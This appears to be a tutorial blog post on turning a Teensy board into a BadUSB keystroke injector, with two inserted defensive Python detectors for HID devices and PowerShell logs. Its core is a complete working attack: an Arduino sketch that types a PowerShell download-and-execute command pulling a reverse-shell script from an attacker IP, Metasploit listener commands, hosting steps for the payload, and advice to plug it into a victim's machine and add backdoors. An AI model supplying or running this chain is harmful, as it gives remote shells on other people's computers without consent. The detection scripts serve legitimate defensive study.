BAD USB using TEENSY
In many of the movies and series I have watched, hackers perform their attacks via USB: the victim just plugs in the USB and their system is compromised, just like that.
So I set out to explore how this attack is performed. After some googling I found out about this good thing.
BAD USB’s:
Most common USB flash drives are exploitable due to the "BadUSB" vulnerability: the microcontroller inside them can be reprogrammed to act as a human interface device (HID), e.g. a keyboard, and type custom keystrokes on the target machine. The attacker programs the desired keystroke sequence into the USB device, and once it is plugged into the victim's machine those keystrokes are executed.
How this works in practice is shown here:
https://youtu.be/sbKN8FhGnqg
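From the defender's side, the tell-tale sign of this attack is a new USB device that enumerates as a keyboard, often alongside a mouse or joystick interface on the same vendor/product ID. As an added example (not part of the original post), the Python script below parses kernel log lines of the kind Linux prints when a USB HID device is attached, and flags keyboards whose vendor/product ID is not on an allowlist as well as the presence of more than one keyboard. The log lines, the allowlist and the vendor/product IDs are constructed assumptions for this demonstration.

```python
import re

# Constructed kernel-log lines (not from the page) in the shape the Linux USB
# stack prints when devices enumerate. The first device is an ordinary keyboard;
# the second is a Teensy programmed as a keyboard. Vendor/product IDs and
# product strings are assumptions made for this demonstration.
SAMPLE_DMESG = """\
[  12.101] usb 1-2: new full-speed USB device number 3 using xhci_hcd
[  12.230] usb 1-2: New USB device found, idVendor=046d, idProduct=c31c, bcdDevice= 1.00
[  12.231] usb 1-2: Product: USB Keyboard
[  12.412] hid-generic 0003:046D:C31C.0001: input,hidraw0: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-2/input0
[ 305.770] usb 1-4: new full-speed USB device number 4 using xhci_hcd
[ 305.900] usb 1-4: New USB device found, idVendor=16c0, idProduct=0482, bcdDevice= 1.00
[ 305.901] usb 1-4: Product: Keyboard/Mouse/Joystick
[ 306.052] hid-generic 0003:16C0:0482.0002: input,hidraw1: USB HID v1.11 Keyboard [Teensyduino Keyboard/Mouse/Joystick] on usb-0000:00:14.0-4/input0
[ 306.060] hid-generic 0003:16C0:0482.0003: input,hidraw2: USB HID v1.11 Mouse [Teensyduino Keyboard/Mouse/Joystick] on usb-0000:00:14.0-4/input1
"""

# "New USB device found" carries the port and the vendor/product ID.
NEW_DEVICE_RE = re.compile(
    r"usb (?P<port>[\d.-]+): New USB device found, "
    r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})", re.I)
# The hid-generic binding line tells us what kind of HID each interface is.
HID_RE = re.compile(
    r"hid-generic 0003:(?P<vid>[0-9a-f]{4}):(?P<pid>[0-9a-f]{4})\.\d+: .*?USB HID v[\d.]+ "
    r"(?P<kind>\w+) \[(?P<name>[^\]]*)\]", re.I)

# Assumption: the organisation's approved keyboards, by vendor:product ID.
KNOWN_KEYBOARDS = {("046d", "c31c")}


def parse_usb_events(log_text):
    """Group enumeration and HID-binding lines by vendor:product ID."""
    devices = {}
    for line in log_text.splitlines():
        m = NEW_DEVICE_RE.search(line)
        if m:
            key = (m["vid"].lower(), m["pid"].lower())
            devices.setdefault(key, {"port": None, "kinds": set(), "names": set()})["port"] = m["port"]
            continue
        m = HID_RE.search(line)
        if m:
            key = (m["vid"].lower(), m["pid"].lower())
            entry = devices.setdefault(key, {"port": None, "kinds": set(), "names": set()})
            entry["kinds"].add(m["kind"].capitalize())
            entry["names"].add(m["name"])
    return devices


def audit_keyboards(log_text, known=KNOWN_KEYBOARDS):
    """Return the keyboards seen, those not on the allowlist, and a verdict."""
    devices = parse_usb_events(log_text)
    keyboards = {k: v for k, v in devices.items() if "Keyboard" in v["kinds"]}
    unknown = [
        {"vid": vid, "pid": pid, "port": d["port"], "name": sorted(d["names"])[0],
         "kinds": sorted(d["kinds"])}
        for (vid, pid), d in keyboards.items() if (vid, pid) not in known
    ]
    return {
        "keyboard_count": len(keyboards),
        "unknown_keyboards": unknown,
        # A second keyboard appearing mid-session, or a keyboard from an unknown
        # vendor that is also a mouse/joystick, is the classic HID-injector signature.
        "suspicious": bool(unknown) or len(keyboards) > 1,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(audit_keyboards(SAMPLE_DMESG), indent=2))
```

On a live host the same signal is available from udev (ACTION=add with ID_INPUT_KEYBOARD=1), which is where a blocking rule or a tool such as USBGuard would sit; the script only shows the decision logic over already-captured log text.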
But these devices cost so much that not everyone can afford them :-/
While searching for an alternate way I found out about this:
Teensy USB Development Board
The Teensy is a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects.
{reference link: https://www.pjrc.com/teensy/}
This costs just a few bucks compared to those BadUSB devices.
Now we’ll proceed on making our bad USB <:-}
Setting up:
- Teensy USB (version 3.0+)
- Kali Linux (maybe in VM)
- Arduino IDE
Configuring the setup:
1. Arduino IDE
Download and install the Arduino IDE, which we will use to compile the code.
2. Setting up Teensy USB on IDE
Download the Teensyduino installer for Windows from: https://www.pjrc.com/teensy/td_146/TeensyduinoInstall.exe
{for other platforms: https://www.pjrc.com/teensy/td_download.html} and run the setup.
Now go into your IDE and configure the Teensy board in the tool settings.
3. Coding:
The code:
#include <paensy.h>
#include <Keyboard.h>

int ds = 500;

void setup() {
  // Configure the delay that everything else scales off of.
  SetDelay(200);
  // Configure the delay that the Morse code uses.
  SetMorseDelay(250);
  // Perform an initial delay to give the USB time to prepare.
  PerformInitDelay();
  // LED pin number: 13 for Teensy 3.1, 11 for Teensy 2 and 2.x
  SetLEDPin(13);
  // Put the pin into output mode
  pinMode(LED_PIN, OUTPUT);
  // Turn on the LED pin so we know the device is running.
  digitalWrite(LED_PIN, HIGH);
  delay(100);

  // Open the Run dialog with Win+R
  Keyboard.set_modifier(MODIFIERKEY_GUI); // Windows key
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);

  // Type "powershell" and press Enter
  Keyboard.print("powershell");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);

  // Replace 10.1.75.77 with your server's IP address and ShellTcp.ps1 with your file
  Keyboard.print("IEX (New-Object Net.WebClient).DownloadString('http://10.1.75.77/ShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.1.75.77 -Port 9898");
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);

  // Win+D shows the desktop, hiding the PowerShell window
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_D);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
}

void loop() {
  // Blink quickly when complete
  digitalWrite(LED_PIN, HIGH);
  delay(ds / 2);
  digitalWrite(LED_PIN, LOW);
  delay(ds / 2);
}
You can change the keyboard layout (key names) to match the victim's machine.
Now as the code is ready we should compile it and upload it into our Teensy.
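Everything the sketch types into the Run dialog and into PowerShell runs as the logged-in user, and on hosts with script block logging enabled that same text is recorded in the PowerShell Operational log as event 4104. As an added example, not part of the original post, the Python script below scans constructed 4104-style event records for the two patterns present in the typed command: a download cradle (Invoke-Expression of content fetched over HTTP) and a reverse-shell invocation. The event records, their field names and the example.invalid URL are assumptions made for this demonstration.

```python
import re

# Constructed Windows "Microsoft-Windows-PowerShell/Operational" records in the
# shape of event 4104 (script block logging). These are not from the page; the
# second block repeats the command the sketch above types, the others are
# assumptions made for this demonstration.
SAMPLE_EVENTS = [
    {"EventID": 4104, "TimeCreated": "2024-05-01T10:00:01Z", "User": "CORP\\alice",
     "ScriptBlockText": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"EventID": 4104, "TimeCreated": "2024-05-01T10:03:12Z", "User": "CORP\\alice",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://10.1.75.77/ShellTcp.ps1');"
                        "Invoke-PowerShellTcp -Reverse -IPAddress 10.1.75.77 -Port 9898"},
    {"EventID": 4104, "TimeCreated": "2024-05-01T10:05:40Z", "User": "CORP\\bob",
     "ScriptBlockText": "$s = (New-Object Net.WebClient).downloadstring('https://example.invalid/u.ps1'); iex $s"},
    # Not a 4104 record, so it must be ignored even though the text would match.
    {"EventID": 4103, "TimeCreated": "2024-05-01T10:06:00Z", "User": "CORP\\bob",
     "ScriptBlockText": "IEX (Invoke-WebRequest https://example.invalid/x)"},
]

# The two halves of a download cradle are matched separately so that argument
# order and casing do not matter ("IEX (...).DownloadString" vs "$s = ...; iex $s").
EVAL_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(
    r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b)", re.I)
REVERSE_RE = re.compile(r"(invoke-powershelltcp|net\.sockets\.tcpclient|\s-reverse\b)", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def classify_script_block(text):
    """Return the names of the detection rules a script block trips, in a fixed order."""
    rules = []
    if EVAL_RE.search(text) and FETCH_RE.search(text):
        rules.append("download_cradle")
    if REVERSE_RE.search(text):
        rules.append("reverse_shell")
    return rules


def scan_script_blocks(events):
    """Scan 4104 records and return one finding per block that trips a rule."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        text = ev.get("ScriptBlockText", "")
        rules = classify_script_block(text)
        if rules:
            findings.append({
                "time": ev.get("TimeCreated"),
                "user": ev.get("User"),
                "rules": rules,
                "urls": URL_RE.findall(text),  # indicators to block at the proxy or firewall
                "script": text,
            })
    return findings


if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_EVENTS):
        print(f["time"], f["user"], ",".join(f["rules"]), f["urls"])
```

The second signal worth correlating with these findings is the launch chain itself: powershell.exe started from the Run dialog (parent explorer.exe) only seconds after a new HID keyboard enumerated. Script block logging has to be switched on (via Group Policy) for the 4104 records to exist at all, which is why it belongs in any baseline that is supposed to catch keystroke-injection devices.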
4. Setting up our listener
Open up your terminal and type the following:
>msfconsole
>use exploit/multi/handler
>set payload windows/x64/shell_reverse_tcp
>set lhost <your ip>
>set lport <the port you are listening>
>run
Remember that the IP address and port in the Teensy code and in your listener must be the same.
5. Setting up the exploit:
As we can see, the Teensy code downloads the file from a link and executes it, so we need a server hosting that file.
In your Kali Linux, set up a web server to serve that file.
Follow these commands:
>sudo apt-get install apache2
>service apache2 start
Download the file from here: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Now run the following commands:
>mv Invoke-PowerShellTcp.ps1 ShellTcp.ps1
>cp ShellTcp.ps1 /var/www/html/
Finishing up
Now plug the Teensy USB into the victim's machine. As soon as it is plugged in, the keystrokes start typing, which finally results in a reverse shell from the victim's machine.
Now that you have the reverse shell in Metasploit you can change the payload and use it, by making backdoors and other stuff.